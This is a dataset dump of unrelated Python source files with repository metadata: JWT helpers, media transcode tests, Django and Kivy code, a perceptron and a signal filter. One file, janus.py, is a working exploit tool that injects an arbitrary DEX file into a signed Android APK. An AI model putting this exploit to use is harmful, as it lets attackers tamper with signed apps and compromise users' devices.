self.payload['flightClasses'].append(resourcePayload)
def addFlightObject(self, resourcePayload):
self.payload.setdefault('flightObjects',[])
self.payload['flightObjects'].append(resourcePayload)
def addTransitClass(self, resourcePayload):
self.payload.setdefault('transitClasses',[])
self.payload['transitClasses'].append(resourcePayload)
def addTransitObject(self, resourcePayload):
self.payload.setdefault('transitObjects',[])
self.payload['transitObjects'].append(resourcePayload)
def generateUnsignedJwt(self):
unsignedJwt = {}
unsignedJwt['iss'] = self.iss
unsignedJwt['aud'] = self.audience
unsignedJwt['typ'] = self.type
unsignedJwt['iat'] = self.iat
unsignedJwt['payload'] = self.payload
unsignedJwt['origins'] = self.origins
return unsignedJwt
def generateSignedJwt(self):
jwtToSign = self.generateUnsignedJwt()
signedJwt = jwtGoogle.encode(self.signer, jwtToSign)
return signedJwt
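# A hedged usage sketch, assuming config.py is filled in with real credentials:
# the object payload and the save-link format are illustrative only.
if __name__ == '__main__':
    jwt = googlePassJwt()
    jwt.addLoyaltyObject({'id': 'ISSUER_ID.OBJECT_ID', 'classId': 'ISSUER_ID.CLASS_ID'})
    signed = jwt.generateSignedJwt()          # bytes, RSA-SHA256 signed
    print('https://pay.google.com/gp/v/save/' + signed.decode('utf-8'))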
| 35.4
| 121
| 0.747237
| 2,751
| 0.675755
| 0
| 0
| 0
| 0
| 0
| 0
| 1,680
| 0.412675
|
429ce61086d20c4c1d15d20e5249184bf0cc61e3
| 4,714
|
py
|
Python
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 83
|
2017-12-11T03:33:10.000Z
|
2022-02-17T15:13:54.000Z
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 3
|
2017-12-25T16:15:44.000Z
|
2018-06-17T11:06:08.000Z
|
janus.py
|
caxmd/januus
|
79208e2450b4c5b1c81346b99814462f6d083b66
|
[
"MIT"
] | 25
|
2017-12-11T03:51:12.000Z
|
2022-02-17T15:13:57.000Z
|
# Includes some code derived from the cpython project.
# Source: https://github.com/python/cpython/blob/master/Lib/zipfile.py
# Excuse the mess.
import argparse
from hashlib import sha1
import os
import struct
from zipfile import _EndRecData, ZipFile
from zlib import adler32
_ECD_SIGNATURE = 0
_ECD_DISK_NUMBER = 1
_ECD_DISK_START = 2
_ECD_ENTRIES_THIS_DISK = 3
_ECD_ENTRIES_TOTAL = 4
_ECD_SIZE = 5
_ECD_OFFSET = 6
_ECD_COMMENT_SIZE = 7
structEndArchive = b"<4s4H2LH"
stringEndArchive = b"PK\005\006"
structCentralDir = "<4s4B4HL2L5H2L"
stringCentralDir = b"PK\001\002"
_DEX_MAGIC = 0
_DEX_CHECKSUM = 1
_DEX_SIGNATURE = 2
_DEX_FILE_SIZE = 3
structDexHeader = "<8sI20sI"
def get_centdirs(filelist):
arr = b""
for zinfo in filelist:
dt = zinfo.date_time
dosdate = (dt[0] - 1980) << 9 | dt[1] << 5 | dt[2]
dostime = dt[3] << 11 | dt[4] << 5 | (dt[5] // 2)
file_size = zinfo.file_size
compress_size = zinfo.compress_size
header_offset = zinfo.header_offset
extra_data = zinfo.extra
min_version = 0
extract_version = max(min_version, zinfo.extract_version)
create_version = max(min_version, zinfo.create_version)
filename, flag_bits = zinfo._encodeFilenameFlags()
centdir = struct.pack(structCentralDir,
stringCentralDir, create_version,
zinfo.create_system, extract_version, zinfo.reserved,
flag_bits, zinfo.compress_type, dostime, dosdate,
zinfo.CRC, compress_size, file_size,
len(filename), len(extra_data), len(zinfo.comment),
0, zinfo.internal_attr, zinfo.external_attr,
header_offset)
arr += centdir
arr += filename
arr += extra_data
arr += zinfo.comment
return arr
def pack_endrec(endrec):
return struct.pack(
structEndArchive,
endrec[_ECD_SIGNATURE],
endrec[_ECD_DISK_NUMBER],
endrec[_ECD_DISK_START],
endrec[_ECD_ENTRIES_THIS_DISK],
endrec[_ECD_ENTRIES_TOTAL],
endrec[_ECD_SIZE],
endrec[_ECD_OFFSET],
endrec[_ECD_COMMENT_SIZE]
)
def get_endrec(file):
pos = file.tell()
endrec = _EndRecData(file)
file.seek(pos)
return endrec
def sort_info(info):
if info.filename.startswith("META-INF"):
return "Z"
else:
return "A"
def get_dex_header(data):
return list(struct.unpack(structDexHeader, data[0:0x24]))
def pack_dex_header(header):
return struct.pack(
structDexHeader,
header[_DEX_MAGIC],
header[_DEX_CHECKSUM],
header[_DEX_SIGNATURE],
header[_DEX_FILE_SIZE]
)
def make_dex_header(header, file_data, final_size):
header[_DEX_FILE_SIZE] = final_size
packed_header = pack_dex_header(header)
signature = sha1()
signature.update(packed_header[0x20:] + file_data)
header[_DEX_SIGNATURE] = signature.digest()
header[_DEX_CHECKSUM] = adler32(
header[_DEX_SIGNATURE] +
packed_header[0x20:] +
file_data
)
return pack_dex_header(header)
parser = argparse.ArgumentParser(description="Creates an APK exploiting the Janus vulnerability.")
parser.add_argument("apk_in", metavar="original-apk", type=str,
help="the source apk to use")
parser.add_argument("dex_in", metavar="dex-file", type=str,
help="the dex file to prepend")
parser.add_argument("apk_out", metavar="output-apk", type=str,
help="the file to output to")
args = parser.parse_args()
with ZipFile(args.apk_in, "r") as apk_in_zip, open(args.apk_in, "rb") as apk_in, open(args.dex_in, "rb") as dex_in, open(args.apk_out, "wb") as apk_out:
dex_data = dex_in.read()
dex_header = get_dex_header(dex_data)
dex_size = os.path.getsize(args.dex_in)
orig_endrec = get_endrec(apk_in)
new_endrec = get_endrec(apk_in)
new_endrec[_ECD_OFFSET] = new_endrec[_ECD_OFFSET] + dex_size
final_size = os.path.getsize(args.apk_in) + dex_size
apk_in_zip.filelist = sorted(apk_in_zip.filelist, key=sort_info)
infolist = apk_in_zip.infolist()
for info in infolist:
info.date_time = (2042, 14, 3, 0, 62, 18)
info.header_offset = info.header_offset + dex_size
out_bytes = b""
out_bytes += dex_data[0x24:]
out_bytes += apk_in.read()[:orig_endrec[_ECD_OFFSET]]
out_bytes += get_centdirs(infolist)
out_bytes += pack_endrec(new_endrec)
out_bytes = make_dex_header(dex_header, out_bytes, final_size) + out_bytes
apk_out.write(out_bytes)
| 31.218543
| 152
| 0.655282
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 426
| 0.090369
|
429cf2c16bb83449ca0bd5d3338a9cac6d753159
| 74
|
py
|
Python
|
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
constants.py
|
phy1um/tmtc-discord-bot
|
7d01cd4c1a78dc0b8aa2bb703c8970ff7bb27f92
|
[
"MIT"
] | null | null | null |
ANNOUNCEMENT_ROLE = "941805571915513857"
GUILD_ID = "878926572235665418"
| 18.5
| 40
| 0.824324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 40
| 0.540541
|
429eedb68c601680755c430f3d242a23508963a5
| 3,352
|
py
|
Python
|
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
test/gst-msdk/transcode/mpeg2.py
|
haribommi/vaapi-fits
|
cbf2a463bd3b2c9af5c45a1376b0bde2b703ed23
|
[
"BSD-3-Clause"
] | null | null | null |
##
### Copyright (C) 2018-2019 Intel Corporation
###
### SPDX-License-Identifier: BSD-3-Clause
###

from ....lib import *
from ..util import *
from .transcoder import TranscoderTest

spec = load_test_spec("mpeg2", "transcode")

class to_avc(TranscoderTest):
    @slash.requires(*have_gst_element("msdkh264enc"))
    @slash.requires(*have_gst_element("msdkh264dec"))
    @slash.requires(*have_gst_element("msdkmpeg2dec"))
    @slash.parametrize(*gen_transcode_1to1_parameters(spec, "avc", "hwhw"))
    @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(AVC_ENCODE_PLATFORMS))
    def test_hwhw_1to1(self, case):
        vars(self).update(spec[case].copy())
        vars(self).update(
            dstextension = 'h264',
            case = case,
            mode = 'hwhw',
            trans_type = 'mpeg2_to_h264',
            gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh264enc ! video/x-h264,profile=main ! h264parse',
            gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
            gstdecoder2 = 'h264parse ! msdkh264dec',
        )
        self.transcode_1to1()

class to_hevc(TranscoderTest):
    @slash.requires(*have_gst_element("msdkh265enc"))
    @slash.requires(*have_gst_element("msdkh265dec"))
    @slash.requires(*have_gst_element("msdkmpeg2dec"))
    @slash.parametrize(*gen_transcode_1to1_parameters(spec, "hevc", "hwhw"))
    @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(HEVC_ENCODE_8BIT_PLATFORMS))
    def test_hwhw_1to1(self, case):
        vars(self).update(spec[case].copy())
        vars(self).update(
            dstextension = 'h265',
            case = case,
            mode = 'hwhw',
            trans_type = 'mpeg2_to_h265',
            gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkh265enc ! video/x-h265,profile=main ! h265parse',
            gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
            gstdecoder2 = 'h265parse ! msdkh265dec',
        )
        self.transcode_1to1()

class to_mjpeg(TranscoderTest):
    @slash.requires(*have_gst_element("msdkmjpegenc"))
    @slash.requires(*have_gst_element("msdkmjpegdec"))
    @slash.requires(*have_gst_element("msdkmpeg2dec"))
    @slash.parametrize(*gen_transcode_1to1_parameters(spec, "mjpeg", "hwhw"))
    @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(JPEG_ENCODE_PLATFORMS))
    def test_hwhw_1to1(self, case):
        vars(self).update(spec[case].copy())
        vars(self).update(
            dstextension = 'mjpeg',
            case = case,
            mode = 'hwhw',
            trans_type = 'mpeg2_to_mjpeg',
            gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmjpegenc ! jpegparse',
            gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
            gstdecoder2 = 'jpegparse ! msdkmjpegdec',
        )
        self.transcode_1to1()

class to_mpeg2(TranscoderTest):
    @slash.requires(*have_gst_element("msdkmpeg2enc"))
    @slash.requires(*have_gst_element("msdkmpeg2dec"))
    @slash.parametrize(*gen_transcode_1to1_parameters(spec, "mpeg2", "hwhw"))
    @platform_tags(set(MPEG2_DECODE_PLATFORMS) & set(MPEG2_ENCODE_PLATFORMS))
    def test_hwhw_1to1(self, case):
        vars(self).update(spec[case].copy())
        vars(self).update(
            dstextension = 'm2v',
            case = case,
            mode = 'hwhw',
            trans_type = 'mpeg2_to_mpeg2',
            gsttrans = 'mpegvideoparse ! msdkmpeg2dec ! msdkmpeg2enc ! mpegvideoparse',
            gstdecoder1 = 'mpegvideoparse ! msdkmpeg2dec',
            gstdecoder2 = 'mpegvideoparse ! msdkmpeg2dec',
        )
        self.transcode_1to1()
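
Each test above reduces to the GStreamer pipeline fragment in `gsttrans`. As a rough illustration of what a case exercises (the `TranscoderTest` harness is not shown here, so the filesrc/filesink wrapping and the file names below are assumptions, not the harness's actual behavior):

# Hypothetical sketch: how the avc `gsttrans` fragment might be wrapped
# into a full gst-launch-1.0 command line by the transcode harness.
src, dst = "input.m2v", "output.h264"  # placeholder file names
gsttrans = ("mpegvideoparse ! msdkmpeg2dec ! msdkh264enc"
            " ! video/x-h264,profile=main ! h264parse")
print(f"gst-launch-1.0 filesrc location={src} ! {gsttrans} ! filesink location={dst}")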
| 38.976744
| 107
| 0.683174
| 3,118
| 0.930191
| 0
| 0
| 2,985
| 0.890513
| 0
| 0
| 943
| 0.281325
|
42a05049df648190833a6dde333b459a1ed6a363
| 10,220
|
py
|
Python
|
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
rusel/base/context.py
|
ruslan-ok/ruslan
|
fc402e53d2683581e13f4d6c69a6f21e5c2ca1f8
|
[
"MIT"
] | null | null | null |
import os, time, mimetypes, glob
from django.utils.translation import gettext_lazy as _
from django.urls import reverse
from task.const import *
from task.models import Task, detect_group
from rusel.base.config import Config
from rusel.base.forms import CreateGroupForm
from rusel.context import get_base_context
from rusel.utils import extract_get_params

class Context:
    def set_config(self, config, cur_view):
        self.config = Config(config, cur_view)

    def get_app_context(self, user_id, search_qty=None, icon=None, nav_items=None, **kwargs):
        context = {}
        if hasattr(self, 'object') and self.object:
            title = self.object.name
        else:
            if 'title' in kwargs:
                title = kwargs['title']
            else:
                title = _(self.config.title).capitalize()
        nav_item = None
        if (Task.get_nav_role(self.config.app) != self.config.get_cur_role()):
            nav_item = Task.get_active_nav_item(user_id, self.config.app)
        if nav_item:
            title = (title, nav_item.name)
            context['nav_item'] = nav_item
        context.update(get_base_context(self.request, self.config.app, self.config.get_cur_role(), self.config.cur_view_group, (hasattr(self, 'object') and self.object is not None), title, icon=icon))
        context['fix_list'] = self.get_fixes(self.config.views, search_qty)
        context['group_form'] = CreateGroupForm()
        context['config'] = self.config
        context['params'] = extract_get_params(self.request, self.config.group_entity)
        if nav_items:
            context['nav_items'] = nav_items
        context['add_item_placeholder'] = '{} {}'.format(_('add').capitalize(), self.config.item_name if self.config.item_name else self.config.get_cur_role())
        if self.config.add_button:
            context['add_item_template'] = 'base/add_item_button.html'
        else:
            context['add_item_template'] = 'base/add_item_input.html'
        if (self.config.group_entity in self.request.GET):
            context['current_group'] = self.request.GET[self.config.group_entity]
        elif ('ret' in self.request.GET):
            context['current_group'] = self.request.GET['ret']
        return context

    def get_sorts(self, sorts):
        ret = []
        for sort in sorts:
            ret.append({'id': sort[0], 'name': _(sort[1]).capitalize()})
        return ret

    def get_fixes(self, views, search_qty):
        fixes = []
        if (self.config.app == APP_ALL):
            common_url = reverse('index')
        else:
            common_url = reverse(self.config.app + ':list')
        nav_item = Task.get_active_nav_item(self.request.user.id, self.config.app)
        for key, value in views.items():
            url = common_url
            determinator = 'view'
            view_id = self.config.main_view
            if (view_id != key):
                if ('role' in value):
                    determinator = 'role'
                    view_id = value['role']
                    url += view_id + '/'
                else:
                    view_id = key
                    if (key != self.config.main_view):
                        if ('page_url' in value):
                            url += value['page_url'] + '/'
                        else:
                            url += '?view=' + key
            if (self.config.app in FOLDER_NAV_APPS):
                folder = ''
                if ('folder' in self.request.GET):
                    folder = self.request.GET['folder']
                if folder:
                    if ('?' in url):
                        url += '&'
                    else:
                        url += '?'
                    url += 'folder=' + folder
            hide_qty = False
            if ('hide_qty' in value):
                hide_qty = value['hide_qty']
            if hide_qty:
                qty = None
            else:
                if (view_id == self.config.group_entity):
                    _nav_item = None
                else:
                    _nav_item = nav_item
                fix_group = detect_group(self.request.user, self.config.app, determinator, view_id, _(value['title']).capitalize())
                qty = self.get_view_qty(fix_group, _nav_item)
            active = (self.config.cur_view_group.determinator == determinator) and (self.config.cur_view_group.view_id == view_id)
            fix = {
                'determinator': determinator,
                'id': view_id,
                'url': url,
                'icon': value['icon'],
                'title': _(value['title']).capitalize(),
                'qty': qty,
                'active': active,
                'search_qty': search_qty,
            }
            fixes.append(fix)
        return fixes

    def get_view_qty(self, group, nav_item):
        data = self.get_dataset(group, nav_item=nav_item)
        return len(data)

    def get_dataset(self, group, query=None, nav_item=None):
        if (group.determinator == 'role'):
            cur_role = group.view_id
        else:
            cur_role = self.config.base_role
        data = Task.get_role_tasks(self.request.user.id, self.config.app, cur_role, nav_item)
        if (self.config.app == APP_ALL) and (not query):
            return data
        if data and ((not group.determinator) or (group.determinator == 'group')):
            data = data.filter(groups__id=group.id)
        # if (not group.completed):
        #     data = data.filter(completed=False)
        if hasattr(self, 'tune_dataset'):
            return self.tune_dataset(data, group)
        return data

    def get_nav_items(self):
        nav_role = Task.get_nav_role(self.config.app)
        if (not nav_role) or (nav_role == self.config.cur_view_group.view_id):
            return None
        href = self.request.path
        if ('pk' in self.kwargs):
            pk = str(self.kwargs['pk']) + '/'
            if (pk in href):
                href = href.split(pk)[0]
        sort = 'name'
        nav_item_group = detect_group(self.request.user, self.config.app, 'role', nav_role, '')
        if nav_item_group and nav_item_group.items_sort:
            sort = nav_item_group.items_sort
        ret = []
        for item in Task.get_role_tasks(self.request.user.id, self.config.app, nav_role).order_by(sort):
            ret.append({
                'id': item.id,
                'name': item.name,
                'qty': len(Task.get_role_tasks(self.request.user.id, self.config.app, self.config.cur_view_group.view_id, item)),
                'href': href,
            })
        return ret

class DirContext(Context):
    def get_context_data(self, **kwargs):
        self.config.set_view(self.request)
        self.object = None
        self.cur_folder = ''
        page_title = ''
        title = ''
        if ('folder' in self.request.GET):
            self.cur_folder = self.request.GET['folder']
            page_title = self.cur_folder.split('/')[-1:][0]
            title = self.cur_folder
        if not self.cur_folder:
            page_title = _(self.config.app_title)
            title = page_title
        kwargs.update({'title': page_title})
        dir_tree = []
        self.scan_dir_tree(dir_tree, self.cur_folder, self.store_dir.rstrip('/'))
        self.scan_files()
        self.object = None
        context = super().get_context_data(**kwargs)
        upd_context = self.get_app_context(self.request.user.id, None, icon=self.config.view_icon, nav_items=None, **kwargs)
        context.update(upd_context)
        context['title'] = title
        context['dir_tree'] = dir_tree
        context['file_list'] = self.file_list
        context['gps_data'] = self.gps_data
        if (self.config.cur_view_group.determinator == 'view') and (self.config.cur_view_group.view_id != self.config.main_view):
            context['cur_view'] = self.config.cur_view_group.view_id
        context['theme_id'] = 24
        context['cur_folder'] = self.cur_folder
        return context

    def scan_dir_tree(self, dir_tree, cur_folder, path, parent=None, demo=False):
        ld = glob.glob(path + '/*/')
        if not len(ld):
            return
        node = ''
        level = 0
        if parent:
            node = parent['node']
            if node:
                node += '/'
            node += parent['name']
            level = parent['level'] + 1
        s_node = node
        if node:
            s_node = node + '/'
        p = path
        for d in ld:
            dd = d.replace('\\', '/')
            name = dd.split(p)[1].strip('/')
            x = {
                'node': node,
                'name': name,
                'active': (cur_folder == s_node + name),
                'level': level,
                'qty': 0,
            }
            dir_tree.append(x)
            if not demo:
                self.scan_dir_tree(dir_tree, cur_folder, path + '/' + name, x)

    def scan_files(self):
        self.gps_data = []
        self.file_list = []
        with os.scandir(self.store_dir + self.cur_folder) as it:
            for entry in it:
                if (entry.name.upper() == 'Thumbs.db'.upper()):
                    continue
                if entry.is_dir():
                    continue
                ff = self.store_dir + self.cur_folder + '/' + entry.name
                mt = mimetypes.guess_type(ff)
                file_type = ''
                if mt and mt[0]:
                    file_type = mt[0]
                self.file_list.append({
                    'name': entry.name,
                    'href': 'file/?folder=' + self.cur_folder + '&file=' + entry.name,
                    'date': time.ctime(os.path.getmtime(ff)),
                    'type': file_type,
                    'size': self.sizeof_fmt(os.path.getsize(ff)),
                })
        return self.gps_data

    def sizeof_fmt(self, num, suffix='B'):
        for unit in ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']:
            if abs(num) < 1024.0:
                return f'{num:3.1f}{unit}{suffix}'
            num /= 1024.0
        return f'{num:.1f}Yi{suffix}'
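
Since `sizeof_fmt` never reads `self`, it can be exercised standalone for a quick sanity check:

# Quick check of the formatter above; `self` is unused, so pass None.
print(DirContext.sizeof_fmt(None, 0))            # 0.0B
print(DirContext.sizeof_fmt(None, 10220))        # 10.0KB
print(DirContext.sizeof_fmt(None, 5 * 1024**3))  # 5.0GB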
| 40.078431
| 196
| 0.531409
| 9,859
| 0.964677
| 0
| 0
| 0
| 0
| 0
| 0
| 946
| 0.092564
|
42a0a34d1333c63396ab8f94b968a15d8d78c49d
| 2,046
|
py
|
Python
|
deepdiy/plugins/system/debugger/debugger.py
|
IEWbgfnYDwHRoRRSKtkdyMDUzgdwuBYgDKtDJWd/diy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 57
|
2019-05-01T05:27:19.000Z
|
2022-03-06T12:11:55.000Z
|
deepdiy/plugins/system/debugger/debugger.py
|
markusj1201/deepdiy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 6
|
2020-01-28T22:42:22.000Z
|
2022-02-10T00:13:11.000Z
|
deepdiy/plugins/system/debugger/debugger.py
|
markusj1201/deepdiy
|
080ddece4f982f22f3d5cff8d9d82e12fcd946a1
|
[
"MIT"
] | 13
|
2019-05-08T03:19:58.000Z
|
2021-08-02T04:24:15.000Z
|
import os, rootpath
rootpath.append(pattern='main.py')  # add the directory of main.py to sys.path
import glob
from kivy.app import App
from kivy.lang import Builder
from kivy.properties import ObjectProperty, DictProperty, ListProperty
from kivy.uix.boxlayout import BoxLayout
import logging, importlib, pkgutil

class Debugger(BoxLayout):
    """Collect and import every debug script found under plugins/system/debugger."""
    data = ObjectProperty()
    debug_packages = ListProperty()
    bundle_dir = rootpath.detect(pattern='main.py')  # obtain the dir of main.py
    # Builder.load_file(bundle_dir + os.sep + 'ui' + os.sep + 'demo.kv')

    def __init__(self):
        super(Debugger, self).__init__()
        self.collect_debug_packages()
        self.run_debug_packages()

    def collect_debug_packages(self):
        for importer, modname, ispkg in pkgutil.walk_packages(
                path=[os.sep.join([self.bundle_dir, 'plugins', 'system', 'debugger'])],
                prefix='plugins.system.debugger.',
                onerror=lambda x: None):
            if len(modname.split('.')) > 4 and '__' not in modname:
                self.debug_packages.append(modname)

    def run_debug_packages(self):
        for modname in self.debug_packages:
            try:
                module = importlib.import_module(modname)
            except Exception as e:
                logging.warning('Fail to load debug script <{}>: {}'.format(modname, e))
        # pass
        # script_path_list = glob.glob(os.sep.join([
        #     self.bundle_dir, 'plugins', 'system', 'debugger', '*/']))
        # module_names = ['.'.join(path.split(os.sep)[-5:-1]) for path in script_path_list]
        # module_names = [name+'.'+name.split('.')[-1] for name in module_names]
        # module_names = [name for name in module_names if name.split('.')[0] == 'plugins' and '__' not in name]
        # for name in module_names:
        #     print(name)
        #     try: module = importlib.import_module(name)
        #     except Exception as e:
        #         logging.warning('Fail to load debug script <{}>: {}'.format(name, e))

class Test(App):
    """Minimal Kivy app wrapper used to run the Debugger widget standalone."""
    data = ObjectProperty()
    plugins = DictProperty()

    def __init__(self):
        super(Test, self).__init__()

    def build(self):
        demo = Debugger()
        return demo

if __name__ == '__main__':
    Test().run()
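
For `collect_debug_packages` to pick a script up, the module has to sit one package below `plugins.system.debugger` (so its dotted name has more than four parts) and contain no `__` in its name. A minimal conforming debug script might look like this (the `my_check` name and layout are assumptions for illustration, not part of this repo):

# Hypothetical file: plugins/system/debugger/my_check/my_check.py
# Imported as 'plugins.system.debugger.my_check.my_check' -- five dotted
# parts, so it passes the len(modname.split('.')) > 4 filter above.
import logging

# Whatever runs at import time is the "debug script"; Debugger only imports it.
logging.info('my_check debug script loaded')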
| 31
| 106
| 0.711632
| 1,695
| 0.828446
| 0
| 0
| 0
| 0
| 0
| 0
| 848
| 0.414467
|
42a141b9ed0d23fd4819a5a6563c8f54190ea8c2
| 1,885
|
py
|
Python
|
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | 3
|
2021-04-15T06:20:31.000Z
|
2021-05-28T05:26:06.000Z
|
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | null | null | null |
supervised_learning/classification/perceptron/perceptron.py
|
Ambitious-idiot/python-machine-learning
|
6c057dd64fb47de3e822b825135d24896ce13a4a
|
[
"MIT"
] | null | null | null |
import numpy as np

class Perceptron:
    def __init__(self, weight, bias=0):
        self.weight = weight
        self.bias = bias

    def __repr__(self):
        return 'Perceptron(weight=%r, bias=%r)' % (self.weight, self.bias)

    def __get_predictions(self, data):
        return np.dot(data, self.weight) + self.bias

    def sign(self, input_vec):
        prediction = self.__get_predictions(input_vec)
        if prediction < 0:
            return -1
        else:
            return 1

    def __get_misclassified_data(self, dataset, labels):
        predictions = self.__get_predictions(dataset)
        misclassified_vectors = predictions * labels <= 0
        misclassified_mat = dataset[misclassified_vectors]
        misclassified_predictions = predictions[misclassified_vectors]
        misclassified_labels = labels[misclassified_vectors]
        return misclassified_mat, misclassified_labels, misclassified_predictions

    def __get_loss(self, dataset, labels):
        _, _, misclassified_predictions = self.__get_misclassified_data(dataset, labels)
        return abs(misclassified_predictions).sum()

    def __optimize_with_sgd(self, dataset, labels, learning_rate=0.1):
        misclassified_mat, misclassified_labels, misclassified_predictions \
            = self.__get_misclassified_data(dataset, labels)
        rand_index = int(np.random.uniform(0, len(misclassified_labels)))
        self.weight = self.weight + learning_rate * misclassified_labels[rand_index] * misclassified_mat[rand_index]
        self.bias = self.bias + learning_rate * misclassified_labels[rand_index]

    def train(self, dataset, labels, loops=100):
        for loop in range(loops):
            if self.__get_loss(dataset, labels) == 0:
                break
            learning_rate = 1 / (1 + loop) + 0.0001
            self.__optimize_with_sgd(dataset, labels, learning_rate)
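
A quick smoke test on a tiny, linearly separable dataset (the data here is made up for illustration). Note that the loss sums only the margins of misclassified points, so an all-zero initial weight would read as zero loss and stop training immediately; start from a nonzero weight:

import numpy as np

dataset = np.array([[2.0, 3.0], [3.0, 3.0], [1.0, 1.0], [0.5, 1.0]])
labels = np.array([1, 1, -1, -1])

p = Perceptron(weight=np.array([1.0, -1.0]), bias=0.0)
p.train(dataset, labels, loops=1000)
print(p)                             # learned weight and bias
print([p.sign(x) for x in dataset])  # typically [1, 1, -1, -1] after convergence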
| 40.106383
| 116
| 0.682228
| 1,863
| 0.988329
| 0
| 0
| 0
| 0
| 0
| 0
| 32
| 0.016976
|
42a1c00f35b59908451cfee2563f53a899db2598
| 901
|
py
|
Python
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | 1
|
2022-01-19T14:31:56.000Z
|
2022-01-19T14:31:56.000Z
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | 1
|
2020-12-08T20:07:24.000Z
|
2020-12-08T20:07:24.000Z
|
pygama/dsp/_processors/trap_filter.py
|
sweigart/pygama
|
3c5fe4c69230814933b2de879b9a305ff0d4ad5e
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from numba import guvectorize

@guvectorize(["void(float32[:], int32, int32, float32[:])",
              "void(float64[:], int32, int32, float64[:])",
              "void(int32[:], int32, int32, int32[:])",
              "void(int64[:], int32, int32, int64[:])"],
             "(n),(),()->(n)", nopython=True, cache=True)
def trap_filter(wf_in, rise, flat, wf_out):
    """
    Symmetric trapezoidal filter
    """
    wf_out[0] = wf_in[0]
    for i in range(1, rise):
        wf_out[i] = wf_out[i-1] + wf_in[i]
    for i in range(rise, rise+flat):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise]
    for i in range(rise+flat, 2*rise+flat):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat]
    for i in range(2*rise+flat, len(wf_in)):
        wf_out[i] = wf_out[i-1] + wf_in[i] - wf_in[i-rise] - wf_in[i-rise-flat] + wf_in[i-2*rise-flat]
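
Because the gufunc signature is `(n),(),()->(n)`, the compiled filter allocates and returns its output when called with just a waveform and the two widths. A minimal sketch on a synthetic step waveform:

import numpy as np

wf = np.zeros(200, dtype=np.float64)
wf[80:] = 100.0  # step of amplitude 100 at sample 80

out = trap_filter(wf, np.int32(20), np.int32(10))  # rise=20, flat=10

# The flat top of the trapezoid integrates `rise` samples of the step,
# so the peak should read rise * amplitude.
print(out.max())  # 2000.0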
| 37.541667
| 102
| 0.558269
| 0
| 0
| 0
| 0
| 848
| 0.941176
| 0
| 0
| 228
| 0.253052
|
42a664bd1e777200555f859b46debbdacf24989f
| 61
|
py
|
Python
|
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | 1
|
2020-09-30T04:34:01.000Z
|
2020-09-30T04:34:01.000Z
|
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | null | null | null |
other.py
|
nunenuh/idcard_datagen
|
694a1736f0f5c97c22462474991a6e32456f9498
|
[
"MIT"
] | null | null | null |
def is_true(a, b, c, d, e, f, g):
    if a > 10:
        print(10)
| 10.166667
| 27
| 0.47541
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
42a67cbf934d63272df061aa18d737365bf0fa29
| 5,109
|
py
|
Python
|
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
pilferer/engine.py
|
Sebastian-dm/pilferer
|
5126377154c7ba08fbea1a9dfad752bf8b1c72a9
|
[
"MIT"
] | null | null | null |
import tcod

from input_handlers import handle_keys
from game_states import GameStates
from render_functions import clear_all, render_all, RenderOrder
from map_objects.game_map import GameMap
from fov_functions import initialize_fov, recompute_fov
from entity import Entity, get_blocking_entity_at_location
from components.fighter import Fighter
from death_functions import kill_monster, kill_player

VERSION = "0.2"
FONT = 'assets/arial10x10.png'

